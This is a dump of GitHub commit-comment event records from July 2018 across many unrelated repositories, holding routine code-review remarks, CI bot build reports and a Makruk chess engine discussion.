{"id":"8030002994","type":"CommitCommentEvent","actor":{"login":"coke"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29861906,"position":null,"line":null,"path":null,"commit_id":"965c2f4633ab0850aa7b2bbd8e2795116eb9b305","created_at":"2018-07-27T18:01:05Z","updated_at":"2018-07-27T18:01:05Z","author_association":"CONTRIBUTOR","body":"FYI, this code snippet doesn't compile; I've fixed it (trailing . on line 403), but we can and should be testing these before pushing them. See instructions in the contributing docs on how to test just your work in progress files to avoid delays."}},"created_at":"2018-07-27T18:01:05Z"}
{"id":"8030006631","type":"CommitCommentEvent","actor":{"login":"rjmccall"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29861913,"position":null,"line":null,"path":null,"commit_id":"0ddd25e455dcf50a3f8af9ecb5be15c0be7b85bb","created_at":"2018-07-27T18:01:50Z","updated_at":"2018-07-27T18:01:50Z","author_association":"MEMBER","body":"Ah, makes sense, thanks."}},"created_at":"2018-07-27T18:01:50Z"}
{"id":"8030008560","type":"CommitCommentEvent","actor":{"login":"japaric"},"repo":{"name":"riscv-rust/compiler-builtins"},"payload":{"comment":{"id":29861917,"position":4,"line":61,"path":"src/lib.rs","commit_id":"c200f6dd62fc538cb5abf0832a95976640120e0e","created_at":"2018-07-27T18:02:12Z","updated_at":"2018-07-27T18:02:12Z","author_association":"NONE","body":"If RV64I could also use this then only the attribute should be changed to `#[cfg(any(target_arch = \"riscv32\", target_arch = \"riscv64\")]`."}},"created_at":"2018-07-27T18:02:12Z"}
{"id":"8030009337","type":"CommitCommentEvent","actor":{"login":"test2a"},"repo":{"name":"frappe/erpnext"},"payload":{"comment":{"id":29861919,"position":31,"line":0,"path":"erpnext/regional/report/eway_bill/eway_bill.py","commit_id":"f5cc1bd44c164b8559b05b2c7d67fe5a85e2e974","created_at":"2018-07-27T18:02:21Z","updated_at":"2018-07-27T18:02:21Z","author_association":"NONE","body":"There are a lot more of units like metric ton, others"}},"created_at":"2018-07-27T18:02:21Z"}
{"id":"8030009528","type":"CommitCommentEvent","actor":{"login":"Seleah"},"repo":{"name":"Seleah/100-days-of-code"},"payload":{"comment":{"id":29861920,"position":null,"line":null,"path":null,"commit_id":"5d0597eec5e9f71848a57d8362700d8f71a4e72f","created_at":"2018-07-27T18:02:24Z","updated_at":"2018-07-27T18:02:24Z","author_association":"OWNER","body":"Update Day 27"}},"created_at":"2018-07-27T18:02:24Z"}
{"id":"8030010566","type":"CommitCommentEvent","actor":{"login":"thaichessswinboard"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29861924,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-27T18:02:37Z","updated_at":"2018-07-27T18:02:37Z","author_association":"NONE","body":"Phoom Saihom <thaichesswinboard@gmail.com>\n6:58 PM (0 minutes ago)\nto *ianfab/Makruk-.*\n\n*it must be this position like this *\n8/8/4m3/2ksn3/8/2K1N3/8/8 b KMkm -\n\nOR\n\n8/8/4m3/2ksn3/8/2K5/8/3R4 b KMkm -\n\nLIKE THAT WHITE WILL SUCIDE MORE PIECES VALUES TO CAPTURE BISHOP.\n\nregard\n\npcst\n\nOn Fri, Jul 27, 2018 at 6:58 PM, Phoom Saihom <thaichesswinboard@gmail.com>\nwrote:\n\n> 8/8/4M3/2ksn3/8/2K1N3/8/8 b KMkm -\n>\n> OR\n>\n> 8/8/4M3/2ksn3/8/2K5/8/3R4 b KMkm -\n>\n> LIKE THAT WHITE WILL SUCIDE MORE PIECES VALUES TO CAPTURE BISHOP.\n>\n> regard\n>\n> pcst\n>\n> On Fri, Jul 27, 2018 at 9:10 AM, Fabian Fichter <notifications@github.com>\n> wrote:\n>\n>> @thaichessswinboard <https://github.com/thaichessswinboard> There do not\n>> seem to be any images in your comment. Could you please provide FENs?\n>>\n>> —\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/ianfab/Makruk-Stockfish/commit/72e094284146c2db8f14c511e2794099c3158305#commitcomment-29855355>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AnxMlMA3hXXlT2Sff1AF4XBU0dPeGmWoks5uKsrggaJpZM4Vghb9>\n>> .\n>>\n>\n>\n"}},"created_at":"2018-07-27T18:02:37Z"}
{"id":"8030011963","type":"CommitCommentEvent","actor":{"login":"rebeccawb"},"repo":{"name":"cucumber-ltd/feynman"},"payload":{"comment":{"id":29861926,"position":null,"line":null,"path":null,"commit_id":"6fd9c810fb7ee32032bdf3b16f852e547585d195","created_at":"2018-07-27T18:02:55Z","updated_at":"2018-07-27T18:02:55Z","author_association":"CONTRIBUTOR","body":"That seemed appropriate when we had a director.\n\nSo now you are introducing/reintroducing perspective in a rather nice way, I think.\n\n-R\n> On Jul 27, 2018, at 10:38 AM, Matt Wynne <notifications@github.com> wrote:\n> \n> Get rid of actor.makeThem\n> \n> @tooky @rebeccawb what do you think? Too much magic?\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/cucumber-ltd/feynman/commit/6fd9c810fb7ee32032bdf3b16f852e547585d195\n> \n\n"}},"created_at":"2018-07-27T18:02:55Z"}
{"id":"8030012640","type":"CommitCommentEvent","actor":{"login":"Schulze18"},"repo":{"name":"AureoGD/Offline-MPC"},"payload":{"comment":{"id":29861927,"position":null,"line":null,"path":null,"commit_id":"58f7378f83cc0bc6aa25f798154cc58d9e7292db","created_at":"2018-07-27T18:03:04Z","updated_at":"2018-07-27T18:03:04Z","author_association":"CONTRIBUTOR","body":"Please recover the file"}},"created_at":"2018-07-27T18:03:04Z"}
{"id":"8030021490","type":"CommitCommentEvent","actor":{"login":"mattwynne"},"repo":{"name":"cucumber-ltd/feynman"},"payload":{"comment":{"id":29861952,"position":null,"line":null,"path":null,"commit_id":"6fd9c810fb7ee32032bdf3b16f852e547585d195","created_at":"2018-07-27T18:04:57Z","updated_at":"2018-07-27T18:04:57Z","author_association":"COLLABORATOR","body":"I'm glad you approve 😀 \r\n\r\nIn fact while you were writing this comment I just renamed `abilities` back to `perspective` (see 3396c3d3aa1a0b7539f3b99bc7daa8b1fe925557)"}},"created_at":"2018-07-27T18:04:57Z"}
{"id":"8030022789","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29861955,"position":null,"line":null,"path":null,"commit_id":"031435057544fb4da1ddb4c3292110e3552bcb37","created_at":"2018-07-27T18:05:14Z","updated_at":"2018-07-27T18:05:14Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-27T18:05:14Z"}
{"id":"8030024872","type":"CommitCommentEvent","actor":{"login":"jaimepn"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29861960,"position":null,"line":null,"path":null,"commit_id":"dfecad027bd49ab6a7d53b01dcc1c267f4d8b5db","created_at":"2018-07-27T18:05:38Z","updated_at":"2018-07-27T18:05:38Z","author_association":"NONE","body":"Anyone having problems, make sure you are using a compatible bootstrap version. Refer to the bootbox website with all the requirements."}},"created_at":"2018-07-27T18:05:38Z"}
{"id":"8030032119","type":"CommitCommentEvent","actor":{"login":"obra"},"repo":{"name":"keyboardio/Kaleidoscope-HIDAdaptor-KeyboardioHID"},"payload":{"comment":{"id":29861972,"position":null,"line":null,"path":null,"commit_id":"f1d80f95968102d0fd84e24b8737b98d9f3cedaa","created_at":"2018-07-27T18:07:08Z","updated_at":"2018-07-27T18:07:08Z","author_association":"MEMBER","body":"I understand where you're coming from.  The reason I made the change is\nthat we haven'tused the terminology 'mod flags' or 'modifier flags'\nanywhere else in the codebase and, initially, for whatever reason, it\nwasn't really clear to me what it meant.\n\nIt may be worth looking at the head of the branch rather than the WIP\ncommits. modifiers_allowed, which I suspect is the name most likely to\ncause the confusion you're concerned about, became modifier_flag_mask.  I\nhadn't yet figured out a name that removed the 'flag' implementation detail\nbut conveyed that it was a bitmask of modifiers that had been toggled on in\nthe most recent key report where modifiers got toggled on.\n\nrequested_mod_flags -did- stay as requested_modifiers. I don't think that's\nwrong though, because at that point how we're storing the maybe-we-will,\nmaybe-we-won't modifiers is an implementation detail and the fact that they\ncame in as flags is less relevant than the fact that they've been requested.\n\nᐧ\n\nOn Fri, Jul 27, 2018 at 5:52 AM Michael Richters <notifications@github.com>\nwrote:\n\n> I don't like this name change. I deliberately used mod_flags rather than\n> simply modifiers to indicate only those modifiers that come from the\n> flags byte of a non-modifier Key. If it's just called modifiers instead,\n> that information is lost, and it appears to apply to all modifiers, even\n> something like a plain Key_LeftShift.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/keyboardio/Kaleidoscope-HIDAdaptor-KeyboardioHID/commit/f1d80f95968102d0fd84e24b8737b98d9f3cedaa#commitcomment-29858112>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACxaE6YVhKYUpFyb9mS0oqUrr7lvXz6ks5uKw0igaJpZM4Vjcjl>\n> .\n>\n"}},"created_at":"2018-07-27T18:07:08Z"}
{"id":"8030033464","type":"CommitCommentEvent","actor":{"login":"TheAz928"},"repo":{"name":"CubePM/MysteryBox"},"payload":{"comment":{"id":29861974,"position":null,"line":null,"path":null,"commit_id":"0082e86b908d6dd1d261d99ae699a2e6394ce781","created_at":"2018-07-27T18:07:27Z","updated_at":"2018-07-27T18:07:27Z","author_association":"COLLABORATOR","body":"actually fixes #5 * typos :man_facepalming: "}},"created_at":"2018-07-27T18:07:27Z"}
{"id":"8030037875","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29861996,"position":null,"line":null,"path":null,"commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-27T18:08:24Z","updated_at":"2018-07-27T18:08:24Z","author_association":"CONTRIBUTOR","body":"> Maybe GCC has hacks to deal with it, but it and adds an annoying special case to our general library story that gums up everything.\r\n\r\nCan you elaborate what is \"our general library story\", I'm not aware of that?\r\n\r\nI don't understand how the rest of the issues are related to libgcc either. Or are you saying that we should be rewriting upstream build systems of say, gfortran to build the target `libgfortran.so` separately from the compiler itself? And the same for rustc and all compilers in existence?\r\n\r\n> It's much more maintainable to dissect individual packages than sap the overall infrastructure.\r\n\r\nIf upstream supports it, yes. But if it means hacking into internals of each and every upstream buildsystem, then hell no, only as the absolute, last possible option."}},"created_at":"2018-07-27T18:08:24Z"}
{"id":"8030039180","type":"CommitCommentEvent","actor":{"login":"lunarraid"},"repo":{"name":"squaretwo/react-native-applovin-event-tracker"},"payload":{"comment":{"id":29862001,"position":34,"line":34,"path":"android/src/main/java/com/squaretwo/applovin/eventtracker/RNApplovinEventTrackerModule.java","commit_id":"61690d78f95c0e7ea70146e682d58c55470b98ad","created_at":"2018-07-27T18:08:40Z","updated_at":"2018-07-27T18:08:40Z","author_association":"NONE","body":"I think this is too closely coupled to the in app billing system we're using. What is the expected contract for `ReadableMap detail`? We should be more explicit about that."}},"created_at":"2018-07-27T18:08:40Z"}
{"id":"8030040089","type":"CommitCommentEvent","actor":{"login":"15knots"},"repo":{"name":"15knots/cmake4eclipse"},"payload":{"comment":{"id":29862004,"position":null,"line":null,"path":null,"commit_id":"8680dc1c7c1fc9a81f175b0be0961dc337e61391","created_at":"2018-07-27T18:08:53Z","updated_at":"2018-07-27T18:08:53Z","author_association":"OWNER","body":"Am Freitag, 27. Juli 2018, 08:58:51 CEST schrieb jponroy:\n> tested in my side. Ok for me\n\nThank you for testing!\n\n-- \nCd wrttn wtht vwls s mch trsr.\n\n\n"}},"created_at":"2018-07-27T18:08:53Z"}
{"id":"8030041315","type":"CommitCommentEvent","actor":{"login":"obra"},"repo":{"name":"keyboardio/Kaleidoscope-HIDAdaptor-KeyboardioHID"},"payload":{"comment":{"id":29862008,"position":5,"line":67,"path":"src/kaleidoscope/hid.cpp","commit_id":"a33c0ae16f7749ac4d2e78fb37e150ce68df4eef","created_at":"2018-07-27T18:09:10Z","updated_at":"2018-07-27T18:09:10Z","author_association":"MEMBER","body":"Thanks."}},"created_at":"2018-07-27T18:09:10Z"}
{"id":"8030048694","type":"CommitCommentEvent","actor":{"login":"DeadLord1337"},"repo":{"name":"Luka967/CSSockets"},"payload":{"comment":{"id":29862023,"position":null,"line":null,"path":null,"commit_id":"03291fd4d08037cb2f0b6923171f8cac01867ab7","created_at":"2018-07-27T18:10:42Z","updated_at":"2018-07-27T18:10:42Z","author_association":"NONE","body":"Hi this is a very good update, it has made my web app 100x more efficient"}},"created_at":"2018-07-27T18:10:42Z"}
{"id":"8030049065","type":"CommitCommentEvent","actor":{"login":"lunarraid"},"repo":{"name":"squaretwo/react-native-applovin-event-tracker"},"payload":{"comment":{"id":29862026,"position":47,"line":47,"path":"android/src/main/java/com/squaretwo/applovin/eventtracker/RNApplovinEventTrackerModule.java","commit_id":"61690d78f95c0e7ea70146e682d58c55470b98ad","created_at":"2018-07-27T18:10:47Z","updated_at":"2018-07-27T18:10:47Z","author_association":"NONE","body":"Instead of creating a new intent here, I wonder if it might make sense to add an `onActivityResult` listener for android, then add functionality to let the library know what `REQUEST_CODE` to listen for. This could potentially auto-send the event to Applovin without having to manually call this method. We might be able to find a way to do this for iOS as well. I would research into this more."}},"created_at":"2018-07-27T18:10:47Z"}
{"id":"8030053827","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29862030,"position":null,"line":null,"path":null,"commit_id":"06a480da23f479ac3594bb914db2dbc6a5951657","created_at":"2018-07-27T18:11:51Z","updated_at":"2018-07-27T18:11:51Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-432](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-432).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-432-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-27T18:11:51Z"}
{"id":"8030054942","type":"CommitCommentEvent","actor":{"login":"adnanaslam475"},"repo":{"name":"PankajKudawala/Firebase-Search"},"payload":{"comment":{"id":29862032,"position":null,"line":null,"path":null,"commit_id":"b6edb639fdfc15e22e49c6680247649764a4e7d7","created_at":"2018-07-27T18:12:07Z","updated_at":"2018-07-27T18:12:07Z","author_association":"NONE","body":"lj"}},"created_at":"2018-07-27T18:12:07Z"}
{"id":"8030063538","type":"CommitCommentEvent","actor":{"login":"AussieGlenn"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29862049,"position":null,"line":null,"path":null,"commit_id":"9130db9aef274a24719807e37fbac8396b8303cd","created_at":"2018-07-27T18:13:55Z","updated_at":"2018-07-27T18:13:55Z","author_association":"NONE","body":"Hi @Caydan ,\r\n\r\nGlad to hear from you again, could not seem to contact you on Discord or TC Forums.\r\n\r\n@Traesh please credit @Caydan with this code, I just modified it to work with Ashamane.\r\n\r\n@Caydan please contact me on Discard/email, love to catch up.\r\n\r\nThanks,\r\n\r\nGlenn"}},"created_at":"2018-07-27T18:13:55Z"}
{"id":"8030068458","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29862066,"position":null,"line":null,"path":null,"commit_id":"b863eb6e939cb9e11beb1e4136244250725d29a3","created_at":"2018-07-27T18:15:00Z","updated_at":"2018-07-27T18:15:00Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1698 of 1698 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-27T18:15:00Z"}
{"id":"8030069372","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29862068,"position":25,"line":21,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T18:15:12Z","updated_at":"2018-07-27T18:15:12Z","author_association":"OWNER","body":"я  так понимаю, что при добавлении поезда, надо добавлять объект train? \r\n"}},"created_at":"2018-07-27T18:15:12Z"}
{"id":"8030075527","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29862074,"position":null,"line":null,"path":null,"commit_id":"e1cdc7acec3c0bc8cba156ba054d8d44dc65ad26","created_at":"2018-07-27T18:16:29Z","updated_at":"2018-07-27T18:16:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-996](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-996).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-996-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T18:16:29Z"}
{"id":"8030077231","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29862075,"position":null,"line":null,"path":null,"commit_id":"1f914feaf994e300427d5954ccffc1e12e36d42e","created_at":"2018-07-27T18:16:51Z","updated_at":"2018-07-27T18:16:51Z","author_association":"COLLABORATOR","body":"This was needed for Sun Studio 12.6  and to a lesser extent the low-end dev-boards. Sun Studio 12.6 is taking too long to compile some of the testing source files. In addition Solaris frequently runs out of swap space when compiling the large files."}},"created_at":"2018-07-27T18:16:51Z"}
{"id":"8030085656","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29862087,"position":null,"line":null,"path":null,"commit_id":"dfb96fb464dd848bca0086b803e95bbbd7e1d7c0","created_at":"2018-07-27T18:18:39Z","updated_at":"2018-07-27T18:18:39Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2991 of 2991 tests passed, 628 test warnings)\n\nMessages:\n\n * 628 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T18:18:39Z"}
{"id":"8030090364","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862096,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-27T18:19:38Z","updated_at":"2018-07-27T18:19:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:19:38Z"}
{"id":"8030091218","type":"CommitCommentEvent","actor":{"login":"thaichessswinboard"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29862097,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-27T18:19:48Z","updated_at":"2018-07-27T18:19:48Z","author_association":"NONE","body":"technic is King and bishop must not move the same line by not nescessary it must move diagnose but sometime can move same but next move must check king opponent it will find mate in 50 or 60 moves it long game and advance move endgames I think computer can do too.\r\n\r\nregaurd\r\nPcst"}},"created_at":"2018-07-27T18:19:48Z"}
{"id":"8030095617","type":"CommitCommentEvent","actor":{"login":"psukys"},"repo":{"name":"nukeop/smash"},"payload":{"comment":{"id":29862107,"position":null,"line":null,"path":null,"commit_id":"29151553ccdfd97b51f614d1597c9d76a09d8a60","created_at":"2018-07-27T18:20:46Z","updated_at":"2018-07-27T18:20:46Z","author_association":"NONE","body":"oops, meant to write it in #8"}},"created_at":"2018-07-27T18:20:46Z"}
{"id":"8030095714","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862108,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-27T18:20:48Z","updated_at":"2018-07-27T18:20:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:20:48Z"}
{"id":"8030098637","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862114,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-27T18:21:25Z","updated_at":"2018-07-27T18:21:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:21:25Z"}
{"id":"8030100547","type":"CommitCommentEvent","actor":{"login":"Jagadishbommareddy"},"repo":{"name":"apache/tomcat"},"payload":{"comment":{"id":29862116,"position":null,"line":null,"path":null,"commit_id":"414f3586e382f942eee62c2b0d3ea7612d8a9886","created_at":"2018-07-27T18:21:49Z","updated_at":"2018-07-27T18:21:49Z","author_association":"NONE","body":"ghgk"}},"created_at":"2018-07-27T18:21:49Z"}
{"id":"8030101374","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862119,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-27T18:21:59Z","updated_at":"2018-07-27T18:21:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:21:59Z"}
{"id":"8030101868","type":"CommitCommentEvent","actor":{"login":"ItsMrQ"},"repo":{"name":"ItsMrQ/NugetPE-Mod-v3.23"},"payload":{"comment":{"id":29862120,"position":null,"line":null,"path":null,"commit_id":"dab2d98124cbb776c1279b1a557e9da9f4351a76","created_at":"2018-07-27T18:22:06Z","updated_at":"2018-07-27T18:22:06Z","author_association":"OWNER","body":"ConverterParameter=50 -> ConverterParameter=100"}},"created_at":"2018-07-27T18:22:06Z"}
{"id":"8030104332","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862124,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-27T18:22:38Z","updated_at":"2018-07-27T18:22:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:22:38Z"}
{"id":"8030138553","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862216,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-27T18:30:03Z","updated_at":"2018-07-27T18:30:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:30:03Z"}
{"id":"8030139069","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862217,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-27T18:30:09Z","updated_at":"2018-07-27T18:30:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been 